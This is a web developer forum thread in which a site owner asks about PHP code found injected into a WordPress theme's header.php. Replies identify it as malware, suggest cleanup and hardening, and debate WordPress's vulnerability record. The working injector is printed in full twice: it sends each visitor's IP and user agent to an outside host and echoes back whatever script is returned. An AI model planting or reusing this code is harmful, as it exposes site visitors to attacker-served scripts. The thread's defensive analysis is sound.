Script inserted in header file?

ilfactotum

I received a notification from a security plugin for wordpress that some php files had been modified,. I found the section of code that was added, but I'm not sure as to whether or not my site has been compromised, since I didn't add this code myself. If anybody could give me some insight as to exactly what the following added code means, it would be greatly appreciated. As far as I can tell, it is trying to open file contents using cURL function using an address generated by combining the user's ip address and my domain name and a few other pieces of information. This section of code was not in this php file originally, and I found it in my theme's header.php file. What exactly does the following script do?

Thanks

<?php
#34b9ec#
error_reporting(0); @ini_set('display_errors',0); $wp_mpqga18 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_mpqga18) && !preg_match ('/bot/i', $wp_mpqga18))){
$wp_mpqga0918="http://"."https"."http".".com/"."http"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mpqga18);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_mpqga0918); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_18mpqga = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_18mpqga = @file_get_contents($wp_mpqga0918);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_18mpqga=@stream_get_contents(@fopen($wp_mpqga0918, "r"));}}
if (substr($wp_18mpqga,1,3) === 'scr'){ echo $wp_18mpqga; }
#/34b9ec#
?>

NogDog

The simple answer is, if you didn't intend it to be there, get rid of it -- it doesn't matter what it's supposed to do*. And be sure to change all of your passwords (both admin and FTP) for that site, make sure you have the latest stable version of WordPress and all of your plug-ins.

At a quick glance, it looks like it's trying to pull in some content from another site to be output inside your page.

schwim

The even more simple answer is yes, your site has been compromised. Here's the code in human-readable format:

<?php
#34b9ec#
error_reporting(0);
@ini_set('display_errors',0);
$wp_mpqga18 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mpqga18) && !preg_match ('/bot/i', $wp_mpqga18))){
	$wp_mpqga0918="http://"."https"."http".".com/"."http"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mpqga18);
	if (function_exists('curl_init') && function_exists('curl_exec')){
		$ch = curl_init();
		curl_setopt ($ch, CURLOPT_URL,$wp_mpqga0918);
		curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$wp_18mpqga = curl_exec ($ch); curl_close($ch);
	}elseif(function_exists('file_get_contents') && @ini_get('allow_url_fopen')){
		$wp_18mpqga = @file_get_contents($wp_mpqga0918);
	}elseif (function_exists('fopen') && function_exists('stream_get_contents')){
		$wp_18mpqga=@stream_get_contents(@fopen($wp_mpqga0918, "r"));
	}
}
if (substr($wp_18mpqga,1,3) === 'scr'){ echo $wp_18mpqga; }
#/34b9ec#
?>

It's an incredibly common exploit. More info on what it's trying to do can be found here and here.

ilfactotum

NogDog;11046491 wrote:
The simple answer is, if you didn't intend it to be there, get rid of it -- it doesn't matter what it's supposed to do*. And be sure to change all of your passwords (both admin and FTP) for that site, make sure you have the latest stable version of WordPress and all of your plug-ins.

At a quick glance, it looks like it's trying to pull in some content from another site to be output inside your page.

Thanks. Yes, I'm going to take the necessary precautions, however I want to determine whether or not the site was indeed hacked, or if this was somehow inserted from a plugin or automated process. I need to know what address the cURL function as well as the file_get_contents is trying to open. The string being passed off to these functions seems to consist of an ip address, a domain name and the user's browser info among a few other things. Just trying to confirm whether the site was indeed compromised. I can understand if you don't want to take a closer look at the code, which is OK, but if you did it would be greatly appreciated. It would also be helpful to me for learning purposes to know what exactly is going on.

Bonesnap

What is the file name that contains this code? If it's anywhere in your theme folder then it's most likely malicious. It is possible that it's from a plugin but from my experience no self-respecting plugin author (or legit plugin author, anyway) would write something like this. It is 99.99% malicious.

It may also help if you listed the plugins that are installed in your site (and activated).

ilfactotum

Bonesnap;11046497 wrote:
What is the file name that contains this code? If it's anywhere in your theme folder then it's most likely malicious. It is possible that it's from a plugin but from my experience no self-respecting plugin author (or legit plugin author, anyway) would write something like this. It is 99.99% malicious.

It may also help if you listed the plugins that are installed in your site (and activated).

Yes, these were found in my theme files. Also to the previous poster, thanks for the links, it seems as if the code is functioning as a window to insert malicious scripts. I'm glad that the security plugin picked this up, and thanks to everyone for the help.

schwim

I would try to figure out how the exploit was performed. Also, be sure to change your user/password!

sneakyimp

Dealing with a server compromise is a real nightmare. I hate to unfairly disparage any framework or CMS without good reason, but I've seen a fair amount of WordPress plugins and Joomla plugins and that sort of thing and tend to be of the opinion that it's risky to use them. There doesn't appear to be any kind of vetting process to make sure they don't have security holes and a great number of them seem to have intentional holes so that people can compromise them.

Is there a security vulnerability in WordPress itself? Possibly.

Without a doubt, the code appears to be an exploit. The question is HOW DID IT GET IN THERE? This question can be extremely difficult to answer. It should be apparent that you are still at risk if you don't close the hole.

I'd be willing to bet that your installation of WordPress requires that your web server have write permissions on at least some portion of your web directory (i.e., the folder from which your website's source code files are served) and that this exploit was installed either directly by a compromised plugin you are using or by a malicious user forming a carefully constructed request to some form or script in your system that has a security hole.

However it was put in there, it may not be the only exploit in your code. If I were you, I would try immediately to refresh my website with pristine code from a copy that I was CERTAIN was not compromised. Keeping such a copy is much easier if you use GIT or SVN to manage your source code. I would also consider searching my http access logs for any unusual words in that code (e.g., "mpqga0918"). If you find that value in your http access logs, it may give you a clue about how the hack was inserted into your code. Or you may not find any reference to it in your logs. If the file was uploaded via some kind of POST operation, I don't know if this text would be in your access log. If you can find the file modification date on the compromised file, you might be able to check the apache log for that specific time and see if there were any weird-looking requests around that time.

Because the hack was able to write one file, there's a very good chance other files could have been written (possibly by different hackers). I would immediately be distrustful of my PHP code and HTML and might even be distrustful of my system over all -- perhaps the exploit was accomplished via some SSH vector? Or FTP? Or was apache compromised?

The ideal situation would be to start with a fresh server that you are CERTAIN is not compromised (like a fresh installed OS, fully patched, etc.) and then load that up with a pristine copy of your uncompromised source code. You might also consider server-hardening actions like
iptables
fail2ban
* samhain

Most importantly, I would be very suspicious of WordPress itself but even more suspicious of plugins written by unqualified devs or possibly even malicious coders.

schwim

Wordpress is without a doubt the most popular exploit target that my site catches. Top three:

1) WP
2) FCKEditor
3) Joomla

An article on Sitepoint stated that it's because of WP's popularity but it's not just that. It's the complete lack of protections against bruteforce attacks that causes hosts to disallaow the script due to the incredible traffic generated just by the bots. As imp stated, once you throw plugins written by faceless entities into the mix, it's no wonder it's as insecure as it is.

sneakyimp

schwim;11046677 wrote:
Wordpress is without a doubt the most popular exploit target that my site catches. Top three:

1) WP
2) FCKEditor
3) Joomla

An article on Sitepoint stated that it's because of WP's popularity but it's not just that. It's the complete lack of protections against bruteforce attacks that causes hosts to disallaow the script due to the incredible traffic generated just by the bots. As imp stated, once you throw plugins written by faceless entities into the mix, it's no wonder it's as insecure as it is.

Interesting detail. fail2ban may be useful to alleviate the bot traffic. It is easily configured to ban remote hosts that repeatedly request non-existent urls. I'm no master, but it might also be configured to keep an eye on a WP login page. Alternatively, you might be able to restrict access to your login page to only certain IP addresses using .htaccess or something.

schwim

The bots are busy today:

[

The ajax page request is also looking for a WordPress install. Theres some generic admin area and editor phishing but the blk is always wp.

Bonesnap

I don't think you need to weary of WordPress; just make sure it's updated to the latest version. Also make sure the theme and plugins you are using are updated as well.

There is always the risk of the software you are using having security vulnerabilities. I don't think that's a reason not to use it if it serves your purposes. In defence of WordPress, they have a security team that's pretty good about patching vulnerabilities sooner rather than later, and even though they don't officially support older versions, they'll still patch a couple versions back from the current one just to make sure people have the latest update.

I do think a large motivation for the attacks on WordPress is its market share; it is by far the most popular blogging platform and CMS on the web.

Also, let's not pretend other CMSs, frameworks, etc. don't offer plugins or the ability to extend base functionality through custom code. WordPress is not unique about that. In that regard WordPress is just one fish in a very large pond (it just happens to be the largest fish).

Weedpacket

Every now and then I find myself searching the NVD (part of NIST). This db gives a summary and a bunch of external links to source databases where more details are provided. Apparently, looking at the search form, they're working on misconfiguration vulnerabilities as well (like leaving display_errors turned on in PHP).

As I write this it lists 994 vulnerabilities for WordPress, though most of them are only of historical interest - there have only been 90 published in the past three months (the most recent, "multiple SQL Injection vulnerabilities in Simple Ads Manager plugin" added yesterday). None of those 90 are for vulnerabilities in WordPress itself - only in plugins and themes. It does make me wonder though why WordPress's API isn't able to do more than it is doing to mitigate the risk of using third-party plugins. How do you end up with SQL Injection vulnerabilities in a theme, say, if you're not (a) ignorant of the underlying platform's functionality, (b) trying to work around some lack in the services provided by that underlying platform, and/or (c) a teapot? (In that specific case the situation would have to be (c): even the underlying platform's underlying platform provides protection against that.)

I figured I'd also take shwim's list and do the same search for FCKEditor, Joomla!, PHP itself (which ended up including WordPress-related vulnerabilities in the same way that a search on WordPress includes plugin-related vulnerabilities), and (to see the impact having all those possible extensions has) Firefox and (because it appears to be what the site itself is running on) ColdFusion. It's probably possible to refine the searches better so that only first-party vulnerabilities are counted (using an OVAL query, apparently), but I'm not being that serious.

Product    | All time | Past three months
-----------+----------+------------------
WordPress  |      994 |   90
FCKEditor  |       20 |    0
Joomla     |      801 |    3
PHP        |    21966 |  263
Firefox    |     1274 |   46
ColdFusion |      115 |    0

Anyhow, my brain still feels like it's gone prolate coronally, so.....

sneakyimp

Weedpacket;11046719 wrote:
Every now and then I find myself searching the NVD (part of NIST).

Interesting. Everday security in the programming world seems like such a non-scientific process. It's good to see something methodical.

Weedpacket;11046719 wrote:
As I write this it lists 994 vulnerabilities for WordPress, though most of them are only of historical interest - there have only been 90 published in the past three months (the most recent, "multiple SQL Injection vulnerabilities in Simple Ads Manager plugin" added yesterday). None of those 90 are for vulnerabilities in WordPress itself - only in plugins and themes. It does make me wonder though why WordPress's API isn't able to do more than it is doing to mitigate the risk of using third-party plugins. How do you end up with SQL Injection vulnerabilities in a theme, say, if you're not (a) ignorant of the underlying platform's functionality, (b) trying to work around some lack in the services provided by that underlying platform, and/or (c) a teapot? (In that specific case the situation would have to be (c): even the underlying platform's underlying platform provides protection against that.)

This is a clearer expression of what I was trying to say. Vanilla wordpress is only marginally useful. One must use plugins to accomplish very basic extensions like custom forms and such. I could be wrong, but AFAIK, WordPress doesn't offer anything like a Good Housekeeping Seal of Approval® for their plugins. There's a strong caveat emptor culture. I hope I don't sound too disparaging when I point out also that WP sites are typically set up for people who know nothing about websites or security. In many cases, WP sites are set up by those who cannot code a custom solution themselves. It's a natural recipe for some pretty lax security practices, largely due to a lack of understanding of how things work or what is dangerous.

Weedpacket;11046719 wrote:

Product    | All time | Past three months
-----------+----------+------------------
WordPress  |      994 |   90
FCKEditor  |       20 |    0
Joomla     |      801 |    3
PHP        |    21966 |  263
Firefox    |     1274 |   46
ColdFusion |      115 |    0

I'm shocked that Joomla doesn't have more vulnerabilities. I've seen some really shoddy and un-scrutinized plugin development in the past.

Weedpacket;11046719 wrote:
Anyhow, my brain still feels like it's gone prolate coronally, so.....

Thank you for bringing some order to the chaos. I personally believe the enthusiasm for and rapid expansion of web app development has far exceeded any reasonable bounds and that security practices are thoroughly neglected. Apparently wall street is starting to take notice. A few interesting stocks, all of which were jumping today:
PANW, PFPT, QLYS, FEYE, IMPV

Bonesnap

Weedpacket;11046719 wrote:
As I write this it lists 994 vulnerabilities for WordPress, though most of them are only of historical interest - there have only been 90 published in the past three months (the most recent, "multiple SQL Injection vulnerabilities in Simple Ads Manager plugin" added yesterday). None of those 90 are for vulnerabilities in WordPress itself - only in plugins and themes.

What were your search parameters? I tried a search just for "wordpress" and left everything else as defaults and got 423 entries dating back to early 2000s. Didn't see anything about plugins or themes though, which makes me think I searched something different than you.

Weedpacket;11046719 wrote:
It does make me wonder though why WordPress's API isn't able to do more than it is doing to mitigate the risk of using third-party plugins. How do you end up with SQL Injection vulnerabilities in a theme, say, if you're not (a) ignorant of the underlying platform's functionality, (b) trying to work around some lack in the services provided by that underlying platform, and/or (c) a teapot? (In that specific case the situation would have to be (c): even the underlying platform's underlying platform provides protection against that.)

Because you're assuming plugin and theme developers are using WordPress' API. WordPress has a DAL. They use MySQLi (if your host is configured to use it). There's a way to parameterize queries that's very similar to [man]printf/man. It's very hard to protect against a custom-written SQL query that doesn't use your API. WordPress has a handbook that lists best practices, dos and don'ts, etc. It's mostly up to developers to follow it.

sneakyimp;11046729 wrote:
Vanilla wordpress is only marginally useful. One must use plugins to accomplish very basic extensions like custom forms and such.

WordPress started out as a blogging platform and grew into a CMS. It's still a blogging platform out of the box. They could bundle a bunch of stuff with it, but that increases bloat that most users are not going to use anyway, leaving unused code in millions of installations (I think you can agree that's bad practice from a security standpoint). Instead the developers opted to keep it as lean as they can since the overwhelming majority of WordPress installations are simply blogs. Only in the last few years has it really grown into a CMS that can actually be used for something useful. And yes, it requires a number of plugins to accomplish that (unless you're a developer and just want to write everything yourself on top of its base code).

sneakyimp;11046729 wrote:
I could be wrong, but AFAIK, WordPress doesn't offer anything like a Good Housekeeping Seal of Approval® for their plugins. There's a strong caveat emptor culture. I hope I don't sound too disparaging when I point out also that WP sites are typically set up for people who know nothing about websites or security. In many cases, WP sites are set up by those who cannot code a custom solution themselves. It's a natural recipe for some pretty lax security practices, largely due to a lack of understanding of how things work or what is dangerous.

You are partially correct about WordPress' approval process of its plugins and themes. They do a review of the plugin, install it, make sure it generally works, etc. How in-depth they go into the code review probably varies based on the plugin. Obviously if there are any glaring issues they reject it. If there are numerous rejections they'll ban you. Keep in mind some plugins can be very complex and contain tens of thousands of lines of code. It could take weeks or months to do a complete, thorough review. And they probably receive dozens of plugin submissions per day. The current plugin index has over 37,000 plugins! And also keep in mind these people are volunteers. They don't get paid to do this.

Also, I'm not sure if the review process applies to updates. It's very possible that once the plugin is approved, subsequent submissions are not reviewed, or are reviewed with a much lower bar.

Lastly, the entire review process is simply to get listed on the official index. Many, many plugins are not available through the official index and are hosted elsewhere. Most of these plugins (and themes) are not free and are hosted on a company's or developer's site. Anyone can write code and provide a download link and say "copy this into your WordPress plugins folder". For better or for worse, WordPress' ecosystem is the complete opposite of Apple's.

Weedpacket

Bonesnap;11046769 wrote:
What were your search parameters? I tried a search just for "wordpress" and left everything else as defaults and got 423 entries dating back to early 2000s. Didn't see anything about plugins or themes though, which makes me think I searched something different than you.

On https://web.nvd.nist.gov/view/vuln/search I entered "WordPress" as the keyword, term, left the search restricted to records with CVE entries (not that it makes much difference at this stage), and toggled between "Search All" and "Search Last 3 Months" for the two columns. I left the checkboxes for CERT alerts and notes blank, and since I don't speak OVAL, I left that checkbox clear as well.

In short, the querystring appended to that URL was [font=monospace]?query=wordpress&search_type=all&cves=on[/font].

Ooh, speaking of CERT, I notice Lenovo has been naughty, and compromised users' security in the process: https://www.us-cert.gov/ncas/alerts/TA15-051A

And while I was there I thought I'd chuck those names at their vulnerability database as well. Nothing fancy, just the quicksearch box on http://www.kb.cert.org/vuls/
I won't bother with the results: it's not a very good search engine - little semantic support. The search for "wordpress" included any note with 'wordpress' in a URL in its references section. I'd limit the search to those that mention it in the title, but I'd have to do it manually and I'd have to do it with the hits on "PHP" too.

Edit:
Okay - the thing about that search engine is that it's really more of a shortcut thing: you already know what record you're looking up but you don't want to thrash through several thousand links to get to it.

http://secunia.com/community/advisories/product/

Might be an easier way to search for specific products and product versions that that company has in its database (

                         All Time    2015
Wordpress 3.x                  20       0
Wordpress 4.x                   1       0
FCKEditor 2.x                   6       0
Joomla! 3.x                     9       0
PHP 5.4.x                      20       4
PHP 5.5.x                      18       4
PHP 5.6.x                       7       4
Mozilla Firefox 36.x            2       2
Mozilla Firefox 37.x            1       1
Adobe Coldfusion 11.x           2       0

)
Note that the raw numbers aren't really enough to go by if you want to make some sort of comparison: one advisory might be for "multiple vulnerabilities", while - for example - all four advisories this year for the different PHP versions are the same four issues.

Problem with that database is that you can't get much more than a short description without signing up to their "community" - you don't even get a CVE identfier.